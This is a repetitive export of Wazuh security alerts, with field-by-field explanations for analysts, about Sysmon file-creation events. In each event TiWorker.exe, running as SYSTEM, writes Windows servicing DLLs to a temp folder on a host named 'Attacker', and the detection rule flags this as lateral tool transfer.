timestamp:  2025-04-24T22:35:54.421+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.676231
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2133548Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260603
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.212 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wrpint.dll CreationUtcTime: 2025-04-20 01:55:28.212 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wrpint.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.469+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.469+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.679192
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2182589Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260605
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.217 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-base-util-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.217 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.217
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-base-util-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.217
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.469+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.469+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.682282
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2214364Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260606
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.219 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-com-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.219 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.219
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-com-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.219
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.496+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.496+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.685368
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2240171Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260607
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.222 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-comm-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.222 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.222
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-comm-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.222
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.513+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.513+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.688458
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2260495Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260608
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.224 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-console-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.224 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-console-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.523+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.523+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.691560
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2285695Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260609
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

